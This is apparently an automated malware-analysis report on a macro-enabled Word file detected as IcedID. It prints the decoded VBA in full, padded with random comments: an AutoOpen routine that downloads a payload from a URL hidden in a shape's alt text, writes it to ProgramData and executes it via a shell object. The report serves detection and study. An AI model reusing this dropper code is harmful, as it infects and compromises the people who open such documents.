MALICIOUS
290
Risk Score
Heuristics 7
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set oxbYr = CreateObject(KglVS + "." + "shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set tMtBu = VBA.CreateObject(UMpgJ + "" + EKGtA) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 14087 bytes |
SHA-256: 0230d0b97100a76ce6b2ff54bd2ac818475c97b8169aa8519c8e4ba4d43dbc8a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QfNaW"
Sub jwEYR(rVzdy, Optional ByVal HuYbH As String = "c:\programdata\QZsRO.txt", Optional ByVal EKGtA As String = "systemobject")
' Vivaciously unawakened tarantula couples findable
' Ladders confirmatory afternoon unchristian habitability croqueted
' Shoddily sugars
' Comprehensibly dream matured yuppies suchlike coulombs mile
' Openminded elevates bituminous overshoots
' Apprehensively
' Nightingale
' Orate longwindedness
' Narration chokes backwoods guesswork
' Homoeopathy
' Unfaithful fans eddying
' Primaries
' Rowdily redhead squash
' Raccoons scribbles reaccept donga
' Muslim histograms
' Reconstituted
' Nudge selling discourtesy annulus
' Skullduggery
' Drawl apprehensive sculler turkeys
' Nursemaid three communicates
' Import calf
' Crusts corgis proclaimers botanical
' Hark
' Knuckles crummy rupert vaporise
' Appealed whodunnit rumple dutifully colluding inferior corrector
Set tMtBu = VBA.CreateObject(UMpgJ + "" + EKGtA)
' Passed erosive insensitivity
' Wetter lambda multiplies gall indecently
' Dancer degeneracies
' Conflagration omits dampness blouses reprise
Set ZszSA = tMtBu.CreateTextFile(HuYbH)
' Ornithology mountains mainsail
' Wigeon with roped overjoyed sincerely
' Turnovers depresses metabolise
' Vigour barmaid piecewise beadier
' Creel radiantly coital toed chaperone
' Darlings effect fishlike fearful
' Quondam schooldays
' Porridge bungle
ZszSA.WriteLine rVzdy
' Strictures rebelled bookies bobsled
' Racialism
' Unsatisfiable pursued daffodils continued resurgence
' Hydrangeas
' Foil videotapes
ZszSA.Close
' Whacko marquee kilt extinguishers
' Stopping reconfiguring distinctness
' Phew literate belles ripened closeness
' Involves adore
' Frijole streaming micro woods godlessness
' Slovenia anther libel
' Solvent censures morbidly unfrozen
' Manageress preheating leg
' Appointees whop gentling slayers
' Deviants waffles maggot ave fullblooded
' Alleges
' Uglier
' Magnetohydrodynamics screeds enthalpy welded
' Dismemberment reorientation trepidation proletarians rhetorician marshmallows agleam
' Adornments expositions ignore
' Carotene holdup
' Prance crunchers spectacular wages
' Pickled district tendency
' Bulldoze resorting funk dulcimer outraging jingled contemplated
' Testers annotates biochemist silts repined mountable
' Crater devote derision sotho
' Prong geometers fraud conjoined
' Hypnotises unstamped imprint energisers meeting
' Spicier
' Indirections recoiling unpractised fossa whizz
' Tabling reflects snivelling radishes
' Neuroscience workouts corner triumphed
' Consistency jurists remit licences
' Dane spattering commutativity
' Lyrist insisted soaps pulsating
' Counterparts attitude crossness
' Excusing sacrament hailed mutes sabretoothed terrifically
' Lazier scotches sneering victualling thuds inconsolably
' Cultivating topped
' Equilibration internationals memphis infeasibility
' Diffusers fiddled oppositions
' Internationalist prescribed jokes scoreless reaction pluperfect
End Sub
' Destine disappears marrow exploratory paschal
' Repute
' Prospering hydride hellfire remuneration
' Propulsive fillings azimuth involve coproduced monophthongs
Sub AutoOpen()
' Fallen introvert harvester
' Comatose tediousness obstetrics
' Aisle shuts onlookers summariser devise
' Capable underdeveloped lactation reviser
' Cardiovascular flashed learns votes
' Crusader rabbit builtin prayers bolstered broadminded
' Atomic gasworks
' Underwrite valley captains unregistered terracing holster
' Fiddling leftists
' Swallow revolt quake
' Limpopo devilled
' Informality hoarse panellist bowl
' Maturity dialectical brasilia
' Decimated loneliness positions
' Occipital halved enlighten swipe inquisition
' Precedence peril rasping redeveloped sinecures
' Lemon addicted
' Anonymous compromises maizes
' Duskier anthologies
' Discrepant consternation moaners isogram
' Wishfully bettered frosty
' Affectation inevitability stubbing koran
' Nonconformists triplets accuser
' Containment
' Overboard slaving structureless prehistoric installer
' Vouchsafing locational tombs
' Improbable apostles drabness curdle
' Underbody mellows
' Distributing issues prolix
' Overfull
Dim rlubY As New RihZD
' Enshroud invader audited
' Arrangeable perpendicular soldiered
' Foresight indicate scaffold
' Repudiate
' Doyens cocking abseiler
cTTMf = ""
' Bricks metre increment interred
' Derision
' Uncomfortably obedience
' Supranationalism pirate redoing dogeared
' Heavenward rediscussed startles enfranchiser
' Bauxite civilians floras byelaw decays
' Decapitations runts intonation transporting
' Unconsecrated surgeon syrups instigator scifi
' Circumstantially coquettishly sponsorships bluffs
' Flooding vulgarity
' Cruised
rVzdy = rlubY.GKQFH(KCzJG)
' Switches
' Lusher hydroxides footbridge upsetting olfactory gushed
' Utah tropically tannins
' Suitcase rooster victims slavic
' Snorkel mutuality
' Trickiest
jwEYR dGZht(rVzdy)
' Parades misfits sundries incapacitated extricating
' Gulfwar belts preponderant breadfruit
' Slobbering bluffing
' Funerary pointedly befuddling agriculturalist independence
' Elastodynamics matinees
' Arouse floozie
' Beastliness broths transaction rockier extrinsically
' Fraught skimmer magnetic daunting hydrangea astrally
' Documentary closeness
' Binomial generally girdle
' Recently harems
yGtOh NeMxm(0) + "vr32 c:\programdata\QZsRO.txt", "wscript"
End Sub
Function eGsbY(ytaNd, dWYhm)
' Sex
' Unleashes
' Earsplitting did
' Disillusioned mayoral
' Transplanted woodwind exaggerate swiftly
' Unmarried taxi maligning proprietors lowness
eGsbY = Split(ytaNd, dWYhm)
End Function
Attribute VB_Name = "buTGd"
' Carcinogenesis escarpment cliff challenged upgrading invalidates busts
' Appreciative
' Moonshine guest anthropological campanological
' Whirlwinds vertebrae intermissions husk rectifier
' Negotiators constructed reputation overruled
' Trumpery
Function dGZht(cHgqY)
' Birthmarks invented legacy forums concurred
' Luckless appendices
' Exterior fusillade
' Unevaluated implosion tautly tow
' Lamenter invigilating south
dGZht = StrConv(cHgqY, vbUnicode)
' Bolstered
' Shovelling tots temerity
' Busted engulfs architecturally
' Tramping
End Function
' Dispersion takeover brinkmanship
' Loans spearing mailmen perform inset
' Tracts munitions pined
' Leaderships
Function ENENb()
' Amorality disastrous freshest happier
' Beta
' Naomi nets brooms
' Diffused kittiwakes squealed meteors crevice
' Underfoot dakoits plug
' Entente superpower
' Thatcher realise raincloud
' Insulter bait pa memorise
' Piped retook wonderment subjugate
' Headscarves measurements sinecurist petrify
' Numeracy notices
With ActiveDocument.shapes(1)
ENENb = .AlternativeText
End With
End Function
' Snaring nitrous paining alaska
' Unendingly
' Eelworms
' Worshipful speculating frightens recasts unread
Function NeMxm(PbLkp)
' Italian records embryonal shrillest
' Reproducibly roundly
' Corroboratory spots floors forest prohibitionist
' Vinyls
' Abusiveness mutations
' Churchwardens knotty
' Minion strains thalamus
' Thus companionable matchable
' Motto guess whomever righting redirected fluff
wSJlz = eGsbY(ENENb(), "~~~")
PtpgR = wSJlz(PbLkp)
NeMxm = PtpgR
End Function
Attribute VB_Name = "RihZD"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function jFmMJ(gVZLv, agRdc, VFsqz)
' Monotheism
' Butchering hardiness sequence provocation
' Cult velar exiguous complained facers fettered
' Shirked refuelling henge historiography ballpen
' Empties
' Plunders jazz industrialise hedgehog
jFmMJ = Mid(gVZLv, agRdc, VFsqz)
End Function
Public Function kyRrv(DELDJ, GTKFR)
' Elder anthrax reabsorbed unalike
' Privileged thrall treasuring foretastes familiar generating
' Ecstatically neutered softened fancying
' Shuttlecock brainteasers
' Gleam pension mouth relocates acyclic
' Exchanged renders repopulated longlost glaze
' Dullest
' Abrasive gentry pageful periodical claptrap
' Cognition ruined pinheads county melting gyrates
' Watertight
' Acers bankruptcies
' Plying cocooned
' Courtyards pus hotrod
' Belongings locksmith lends explanatory chartering snatches
' Thermostatically twisted slouching monomial mortality
EAjIR = Trim(DELDJ)
For gIvuw = GTKFR To Len(EAjIR)
pReOh = jFmMJ(EAjIR, gIvuw, GTKFR) & pReOh
Next gIvuw
kyRrv = pReOh
End Function
' Cheering leftover judas turnover
' Probabilities gamblers champ sweepstake
' Optimising authors bunked
' Liferafts shops opprobrious premiers fluctuated placer
' Comet reappoint egret
' Whoever stews mailed authoring autopsies badged
' Spanker linnets retaliated warns linker
Function GKQFH(GLOtr)
' Undistinguished trowel
' Landless latter pesetas differentiation progenitor
' Pudding merrier mortalities
' Solidly realpolitik derates decriminalise instigate harbours
' Agencies hearer pave
Dim TLNWG As Object
' Vacations plurals style
' Caters bookshelves jingo phosphorescent sent immovability
' Dupe addenda
' Togs soccer internal enriching cookbook brazier
' Steadily
' Perfectly congressional garbs sniggering
' Actionable lamentations dichotomies
' Dessert tendered ethnical
' Bun brasilia treated zigzagged sac
Set TLNWG = CreateObject(kyRrv(GLOtr, 1) + "." + kyRrv(GLOtr, 1) + "Request.5.1")
' Eventing
' Ploughmen apples wholefood
' Recured rubbishing
' Bunglers footlights
' Septic
' Taxied wholesale barre salts
' Callously torrid deuteron reliance
' Deficit envies
' Rendered preposterous
' Ellipsoids swishy perverseness creationist
' Engulfs misanthropy downloads
' Typographer sunflower bloodshed
' Tinsel auks compartmentalised downsize stuff
' Mixups
' Veg authenticator
' Missing peter
' Surest
' Underpin rivalled
' Copes shells
' Lover leashed tattoo buyers
' Swallower allegory weal progresses
' Hydrophobic biosynthesis teased
' Quickly prizes rebelliousness impala demonstrated
' Flexes hummingbird
' Marmalade quincentenary compliance cosmetically
' Writing
' Polyps piecing reinforces
' Mullah boarder
WkFIS = NeMxm(1)
' Pocketed centre smallpox acceptably horsemen recantation
' Gilding verify vacillation designedly sombrero
' Antrum maladjusted inconclusive athletic clairvoyance
' Prussia grilled remoteness milt ghostlike unexpired
' Enclosing vindicate graphs
' Dreadfulness bivalves
TLNWG.Open "GET", kyRrv(WkFIS, 1), False
' Pundits dovetails loftiness silicate mileposts paving bus
' Sets superfluously belatedly
' Observatory
' Marriageable whittled mullahs
' Squeamishness communitarian lodestar
' Fears mastoid salient
TLNWG.Send
' Gridded slackest scratchings morn
' Instrumentality balustrade denying scherzo
' Livening evangelising facilitation
' Backwoodsmen befog outwork mahatma
' Sarcophagus sledding buttonholed denatured
' Jolts recaps incredulity undereducated correcting recovery clashing
GKQFH = TLNWG.responsebody
End Function
Attribute VB_Name = "tUqbz"
Public Const KCzJG As String = "ptthniw"
Public Const UMpgJ As String = "scripting.file"
Sub yGtOh(cwwZl, KglVS)
' Syncopated collar accost testaments
' Welloff jap performs
' Leniency agglomeration stalin sloppily
' Isometry revenged pebbled magnesia
' Charmer orbs scarlets
' Nebulas
' Walkabouts
Set oxbYr = CreateObject(KglVS + "." + "shell")
' Proofed milligrams
' Woodenly excavators duo princely
' Dispiriting eigenfunctions isothermally inaction zinc
' Beryllium titres
' Wrist searchlight pursue
' Punters amino gaucheness ligaturing blackballing
' Dilapidated canton justifiability inoperative incinerator
' Disestablishing paunch telly witchdoctor turbot
' Aniseeds opiate vitamin
' Escapes
' Auxiliaries loo caster outperforming scrooge resurrected
' Analogously chivvied tagged
' Reassigns auger scything spurn stake
' Christ muffle millipedes predicative lemon attuned hypersensitivity
' Mistakenly basque phoenix actuated
' Dustman necrophiliac empires shamefacedly
' Osteoarthritis
' Redeems discounts ulster cogitated soundlessly rehabilitated conspicuous woolly
' Sectarian tarring perambulations jailed
' Beginner miscomprehended revolve
' Scantier perpendicular bosons
' Prosperity breastfeed
' Wellfounded compensates reconstituted guidelines flyhalf unenthusiastic components
' Micron elevator navigate rulers
' Thieved zebra exclude
' Spicier certainties snips snip
' Mimeographed intercollegiate injured spews
' Thane coiner
' Beryllium undereducated strongroom
' Waterwheel serenade immaturity
' Platypuses restriction
' Hospitable knitters tropical mappings bookmaking
' Plato hypnotic ferment cheats prosperous enigmas renewable coagulate
' Deformation messed valley abound
' Dismembered congratulatory announcing vehemence
' Secedes pulpit caverns crucifying coterie
' Decree agonise blind
' Brewer differencing squall ineffectively resolved
' Bowie tenuous partiality
' Peseta relationships shafted
' Adhesiveness augustus syphon analyst
' Chevalier cumulative afghans relighting cheats
' Flourishing dynast inaugurates notable
' Seattle pies entrancing treasurers impolite
' Fibrillation tuning getting
' Chivalric angry consorts headmistresses
Call oxbYr.exec(cwwZl)
' Con ballistic
' Disobeying incised handgun rolled factotum
' Implies flute tappers scythes crayon jotted tasks
' Corporeally derivatives
' Morphogenesis radiologists alcove
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 49664 bytes |
SHA-256: a3c07a42ff6cb159b8682623884a69bc89ccee32d30795bcaa9994e6c4fd83ea |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.